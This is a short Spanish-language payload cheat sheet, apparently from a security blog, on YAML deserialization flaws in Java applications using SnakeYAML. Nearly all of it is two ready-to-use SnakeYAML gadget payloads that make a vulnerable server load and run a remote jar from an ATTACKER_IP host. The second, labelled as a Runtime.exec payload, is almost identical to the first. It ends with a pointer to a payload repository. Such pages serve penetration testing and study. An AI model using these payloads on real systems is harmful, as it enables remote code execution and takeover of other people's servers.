YAML Deserialization — Payloads

March 31, 2026  

YAML Deserialization

Vulnerabilidad en aplicaciones que deserializan datos YAML sin validar, común en aplicaciones Java que usan SnakeYAML.

---

SnakeYAML RCE

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://ATTACKER_IP/payload.jar"]
  ]]
]

Payload con Runtime.exec

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://ATTACKER_IP:8080/yaml-payload.jar"]
  ]]
]

Referencia

• artsploit/yaml-payload — Repo con ejemplos de payloads para explotación de deserialización YAML via SnakeYAML.